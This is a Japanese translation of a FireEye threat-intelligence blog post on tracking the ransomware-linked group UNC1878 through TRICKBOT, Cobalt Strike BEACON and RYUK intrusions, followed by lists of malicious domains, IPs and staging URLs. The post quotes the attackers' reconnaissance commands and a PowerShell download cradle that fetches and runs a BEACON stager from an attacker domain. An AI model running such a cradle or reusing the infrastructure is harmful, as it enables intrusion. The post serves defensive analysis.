新しい侵入を発見すると、私たちは、一連の活動全体の理解を助ける質問を自問します。
この活動はどの程度一般的か?このマルウェアまたはキャンペーン攻撃には独自性または特殊性があるか?TTPやインフラに関して、新しいものと古いものはどれか?これはどこか別の環境で見られるか?この攻撃グループの性質を実証するものとして、どのような情報を持っているだろうか?
時間をかけて動きの速い攻撃者を追跡するために、我々は、攻撃者上の新しい発見と評価を有効にして、内に潜む侵入データを明らかにし、他のデータ集合と変換し、そしてその知識を分析者とインシデント対応担当者がすぐに利用できるようにしました。FireEye Advanced Practicesチームの存在によって、他の誰よりも攻撃者について多くのことを知ることができます。先のような質問をしたり答えたりすることによって、アナリストはセキュリティ対策に取り組めるようになります。このブログ記事では、FireEyeのグローバルなデータセットにわたって金銭目的の攻撃者を追跡するために、特定、拡大、発見のサイクルを活用する方法を解説します。
特定
2020年1月29日、FireEye Managed Defenseサービス・チームは米国を拠点としたお客様に対し、TRICKBOTの多数の展開を調査しました。初期展開直後に、TRICKBOTのnetworkDllモジュールは以下のネットワーク偵察コマンドを実行しました(図1)
ipconfig /all net config workstation net view /all net view /all /domain nltest /domain_trusts nltest /domain_trusts /all_trusts |
図1:最初の偵察
偵察から約20分後に、攻撃者はPowerShellコマンドを実行して、メモリ内のCobalt Strike HTTPS BEACONステージャーをダウンロードして実行しました(図2)。
cmd.exe /c powershell.exe -nop –w hidden –c “IEX ((new-object net.webclient).downloadstring(‘hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt’))” |
図2:Cobalt Strikeステージャーをリクエストするために使用されるPowerShellダウンロード・クレードル
6分後、Managed Defenseサービス・チームは内部偵察の証拠と、BEACONインプラントを通した水平展開の試行を特定しました。Managed Defenseサービス・チームが活動の認められたお客様にアラートを発信し、侵害されたホストを封じ込め、追跡中の侵入を停止させました。TRICKBOT感染から水平展開を試行するまでに約46分間空いているのは非常に珍しく、巧妙になりすましたドメインとともに、我々のチームによるさらなる調査が必要になりました。
程度が軽くても、この侵入のインジケーターは、UNC1878と呼ばれる未分類の脅威グループを作成するのに十分なものでした。最初のクラスタリングの時点では、Managed Defenseサービス・チームによる侵入封じ込めが迅速であったため、UNC1878の意図が十分に理解されませんでした。このラベルを作成することで、Managed Defenseの調査による活動をひとつのエンティティに関連付けることが可能になり、このグループへの理解を広げ、活動を経時的に追跡することができます。これは、マルウェア・キャンペーンを活用して双方向に活動する攻撃者を描写するのに役立つため、大量のマルウェアが関与するキャンペーン攻撃を処理する場合に特に重要です。クラスタリング手法の詳細については、これらのクラスターを大規模に解析、分離、またはマージする方法についてのブログ記事をご覧ください。
拡張
C2(コマンドアンドコントロール)ドメインでピボットすることで、UNC1878ネットワーク・インフラのプロファイルの構築を開始することができました。cylenceprotect[.]comのWHOISレコード(図3)によると、2020年1月27日にレジストラ「Hosting Concepts B.V.d/b/a Openprovider」によってドメインが登録されています。その約2日後に、我々は、このドメインがManaged Defenseサービスのお客様に影響を与える活動に使われたことを観察しました。
Domain Name: cylenceprotect.com Registry Domain ID: 2485487352_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.registrar.eu Registrar URL: http://www.registrar.eu Updated Date: 2020-01-28T00:35:43Z Creation Date: 2020-01-27T23:32:18Z Registrar Registration Expiration Date: 2021-01-27T23:32:18Z Registrar: Hosting Concepts B.V. d/b/a Openprovider |
図3:ドメインcylenceprotect[.]comのWHOISレコード
サーバーに注目すると、ドメインは45.76.20.140に解決され、これはVPSプロバイダーChoopaが所有するIPアドレスです。また、ドメインは自己ホスト型ネームサーバーns1.cylenceprotect[.]comとns2.cylenceprotect[.]comを使用しており、これもまたChoopa のIPアドレスに解決されています。サーバーのネットワーク・スキャン・データは、ポート80および443で証明書が見つかりました。その一部を図4に示します。
Certificate: Data: Version: 3 (0x2) Serial Number: 03:a8:60:02:c7:dd:7f:88:5f:2d:86:0d:88:41:e5:3e:25:f0 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Jan 28 02:02:14 2020 GMT Not After : Apr 27 02:02:14 2020 GMT Subject: CN=cylenceprotect[.]com |
図4:ドメインcylenceprotect[.]comのTLS証明書
証明書は、Let's Encryptによって発行され、Managed Defenseが活動を検知する前の24時間以内に有効期限が開始になっており、この攻撃グループが活動する速度が実証されました。図4の証明書のほかに、ポート54546(デフォルトでは50050)で生成されたデフォルトの自己署名Cobalt Strike証明書(図5)も特定しました。
Certificate: Data: Version: 3 (0x2) Serial Number: 1843990795 (0x6de9110b) Signature Algorithm: sha256WithRSAEncryption Issuer: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike Validity Not Before: Jan 28 03:06:30 2020 GMT Not After : Apr 27 03:06:30 2020 GMT Subject: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike |
図5:UNC1878で使用されたデフォルトのCobalt Strike TLS証明書
ポート80および443の証明書と同様に、最も早い有効な日付もまた、Managed Defenseが特定した侵入の24時間以内でした。サーバーでの解析を続行して、Amazon malleable C2プロファイルを使用するように設定されたBEACONステージャーと後続のBEACONペイロードを取得しました。
これらのインジケーターは、それ自体には大きな重要性がないかもしれませんが、関連するインフラを事前に発見できるようにするための認識可能なパターンを作り出します。そこで、UNC1878で使用されるのと同等の特性を持つサーバーのハンティングを開始しました。サードパーティのスキャン・データを使用して、以下のようなUNC1878手法の大部分に一致する他のサーバーをすばやく特定しました。
- ドメインは通常、「update」、「system」、「service」などの一般的なITまたはセキュリティ関連の用語で構成される
- Hosting Concepts B.V. d/b/a Openprovider」に登録されているドメイン(2019年12月19日)
- 自己ホスト型ネームサーバー
- ポート80のLet's Encrypt証明書
- 仮想プライベート・サーバーは、主にChoopaによってホストされる
- Amazonの展性のあるC2プロファイルで構成されたBEACONペイロード
- 非標準ポートのCobalt Strike Teams Server
UNC1878手法に一致する証明書とともに、自己署名のArmitage証明書も見つかりました。これは、このグループが複数の攻撃的なセキュリティ・ツールを使用する可能性があることを示しています。
単一のManaged Defense侵入から抽出された限定的なインジケーターを中心に、活動の規模の小さいクラスターが、UNC1878の基礎となる、より多様なインジケーター群に拡張されました。この攻撃グループの目的と目標はまだ明確になっていませんが、インフラの相関により、他のお客様に対してこの攻撃グループの運用を認識することができました。
発見
UNC1878の確立された手口を用いて、我々のチームは、次週にわたってFireEye Mandiant調査を支援するためにいくつかの関連する侵入を迅速に特定しました。元々のManaged Defenseの調査から、UNC1878の最初のクラスター化と拡大の2日以内に、Mandiantインシデントレスポンス担当者は、以前にUNC1878を特定し、それに起因している複数のインジケーターが見られる活動を米国の医療機器企業で調査していました。起因しているドメイン、ペイロード、および方法論により、コンサルタントは、検知を構築するためのベースラインと、攻撃者の能力とスピードに対する確証を得ました。
3日後、レストランチェーンで別のインシデントレスポンス対応中にUNC1878が特定されました。Mandiantコンサルタントはこの対応で、何百ものシステムにRYUKランサムウェアの展開を試みた証拠を発見し、最終的にUNC1878の最終目標を明らかにすることができました。数週間後、Mandiant Incident ResponseやManaged Defenseサービスのお客様環境において、我々は侵入のさまざまな段階でUNC1878を継続して発見しました。
サービスのデータによって、我々はこれらの侵入に対する深い理解を得ることができますが、当社の製品のテレメトリーからは、幅広い活動を理解し、この攻撃グループの世界的な普及に関する全体感と見通しを得られます。その結果、MandiantチームはUNC1878の侵入をテクノロジー企業で検知し、影響を受けたお客様に即座に通知しました。FireEyeのサービスおよび製品をご利用のお客様の間でUNC1878の複数の侵入を相関させることにより、標的設定が無差別であるという、日和見的なランサムウェア・キャンペーンの共通の特徴が明らかになりました。
当初、UNC1878の意図には数多くの疑問がありましたが、コンサルタントやアナリストに機能に関する貴重な知見を提供することができました。また、これらの対応中に収集された侵入情報は、UNC1878手法の理解を構築するサイクルを継続し、緊急のランサムウェア展開に直面しても、インシデントレスポンス担当者がこれらのインシデントを迅速に処理できるようになりました。
結論
攻撃グループは、引き続き大規模なマルウェア・キャンペーンを使用して、標的の環境に足場を確立し、その後、RYUK、DOPPLEPAYMER、MAZEなどのランサムウェアの展開に焦点を当てた双方向の運用を行います。FireEyeが対応している侵入の傾向を見ると、従来のPCI(クレジットカード情報)窃取からランサムウェアへの移行が進むにつれ、UNC1878などの攻撃グループはその対象範囲を広げ、テンポを早め、企業はビジネス中断や身代金の支払いによって何百万ドルも費やしています。しかし、UNC1878は、その速度とは別に、この傾向に従うグループの数が増えている中で目立ったものではなく、このブログの記事の重要ポイントではありません。
UNC1878のために使われる解析と検知のサイクルは、大規模に影響のある攻撃を迅速に検知し追跡するという、我々のチームの使命の中核にあたります。Managed Defenseのお客様での単一の侵入から始まり、多数のお客様環境でUNC1878活動を検知することができました。活動の初期段階の解析を用いて、関係がないと思われる調査全体でこの攻撃者をピボット化し、追跡することができました。我々がUNC1878の手法の理解を高め、拡大するにつれて、FireEyeのMandiantとManaged Defenseが、標的組織に影響を及ぼすことを最終目標にする金銭目的の攻撃グループを効率的に特定、対応することによって消滅させることを可能にします。この攻撃者の追跡に適用される原則は、あらゆる攻撃者を追跡するために重要であり、結局のところ、Advanced Practicesチームの活動がFireEyeエコシステム全体でどれほど意味があるものかを表しています。
謝辞
このコンテンツの技術レビューを実施してくれたAndrew Thompson、Dan Perez、Steve Miller、John Gorman、Brendan McKeagueに感謝します。また、我々の調査を可能にする貴重な侵入データを収集している、最前線のインシデント対応担当者に感謝します。
Indicators of Compromise
Domains
- aaatus[.]com
- avrenew[.]com
- besttus[.]com
- bigtus[.]com
- brainschampions[.]com
- checkwinupdate[.]com
- ciscocheckapi[.]com
- cleardefencewin[.]com
- cmdupdatewin[.]com
- comssite[.]com
- conhostservice[.]com
- cylenceprotect[.]com
- defenswin[.]com
- easytus[.]com
- findtus[.]com
- firsttus[.]com
- freeallsafe[.]com
- freeoldsafe[.]com
- greattus[.]com
- havesetup[.]net
- iexploreservice[.]com
- jomamba[.]best
- livecheckpointsrs[.]com
- livetus[.]com
- lsassupdate[.]com
- lsasswininfo[.]com
- microsoftupdateswin[.]com
- myservicebooster[.]com
- myservicebooster[.]net
- myserviceconnect[.]net
- myserviceupdater[.]com
- myyserviceupdater[.]com
- renovatesystem[.]com
- service-updater[.]com
- servicesbooster[.]com
- servicesbooster[.]org
- servicesecurity[.]org
- serviceshelpers[.]com
- serviceupdates[.]net
- serviceuphelper[.]com
- sophosdefence[.]com
- target-support[.]online
- taskshedulewin[.]com
- timesshifts[.]com
- topsecurityservice[.]net
- topservicehelper[.]com
- topservicesbooster[.]com
- topservicesecurity[.]com
- topservicesecurity[.]net
- topservicesecurity[.]org
- topservicesupdate[.]com
- topservicesupdates[.]com
- topserviceupdater[.]com
- update-wind[.]com
- updatemanagir[.]us
- updatewinlsass[.]com
- updatewinsoftr[.]com
- web-analysis[.]live
- windefenceinfo[.]com
- windefens[.]com
- winsysteminfo[.]com
- winsystemupdate[.]com
- worldtus[.]com
- yoursuperservice[.]com
IP Addresses
- 31.7.59.141
- 45.32.30.162
- 45.32.130.5
- 45.32.161.213
- 45.32.170.9
- 45.63.8.219
- 45.63.95.187
- 45.76.20.140
- 45.76.167.35
- 45.76.231.195
- 45.77.58.172
- 45.77.89.31
- 45.77.98.157
- 45.77.119.212
- 45.77.153.72
- 45.77.206.105
- 63.209.33.131
- 66.42.97.225
- 66.42.99.79
- 79.124.60.117
- 80.240.18.106
- 81.17.25.210
- 95.179.147.215
- 95.179.210.8
- 95.179.215.228
- 96.30.192.141
- 96.30.193.57
- 104.156.227.250
- 104.156.245.0
- 104.156.250.132
- 104.156.255.79
- 104.238.140.239
- 104.238.190.126
- 108.61.72.29
- 108.61.90.90
- 108.61.176.237
- 108.61.209.123
- 108.61.242.184
- 140.82.5.67
- 140.82.10.222
- 140.82.27.146
- 140.82.60.155
- 144.202.12.197
- 144.202.83.4
- 149.28.15.247
- 149.28.35.35
- 149.28.50.31
- 149.28.55.197
- 149.28.81.19
- 149.28.113.9
- 149.28.122.130
- 149.28.246.25
- 149.248.5.240
- 149.248.56.113
- 149.248.58.11
- 151.106.56.223
- 155.138.135.182
- 155.138.214.247
- 155.138.216.133
- 155.138.224.221
- 207.148.8.61
- 207.148.15.31
- 207.148.21.17
- 207.246.67.70
- 209.222.108.106
- 209.250.255.172
- 216.155.157.249
- 217.69.15.175
BEACON Staging URLs
- hxxp://104.156.255[.]79:80/avbcbgfyhunjmkmk
- hxxp://149.28.50[.]31:80/adsrxdfcffdxfdsgfxzxds
- hxxp://149.28.81[.]19:80/ajdlkashduiqwhuyeu12312g3yugshdahqjwgye1g2uy31u1
- hxxp://45.32.161[.]213:80/ephfusaybuzabegaexbkakskjfgksajgbgfckskfnrdgnkhdsnkghdrngkhrsngrhgcngyggfxbgufgenwfxwgfeuyenfgx
- hxxp://45.63.8[.]219:80/ajhgfrtyujhytr567uhgfrt6y789ijhg
- hxxp://66.42.97[.]225:80/aqedfy345yu9876red45f6g78j90
- hxxp://findtus[.]com/akkhujhbjcjcjhufuuljlvu
- hxxp://thedemocraticpost[.]com/kflmgkkjdfkmkfl
- hxxps://brainschampions[.]com:443/atrsgrtehgsetrh5ge
- hxxps://ciscocheckapi[.]com:80/adsgsergesrtvfdvsa
- hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt
- hxxps://havesetup[.]net/afgthyjuhtgrfety
- hxxps://servicesbooster[.]org:443/sfer4f54
- hxxps://servicesecurity[.]org:443/fuhvbjk
- hxxps://timesshifts[.]com:443/akjhtyrdtfyguhiugyft
- hxxps://timesshifts[.]com:443/ry56rt6yh5rth
- hxxps://update-wind[.]com/aergerhgrhgeradgerg
- hxxps://updatemanagir[.]us:80/afvSfaewfsdZFAesf
本ブログは、米FireEyeが公開した March 31, 2020「It’s Your Money and They Want It Now — The Cycle of Adversary Pursuit」(英語)の日本語抄訳版です。
日本語版:Reviewed by Toru Tanimura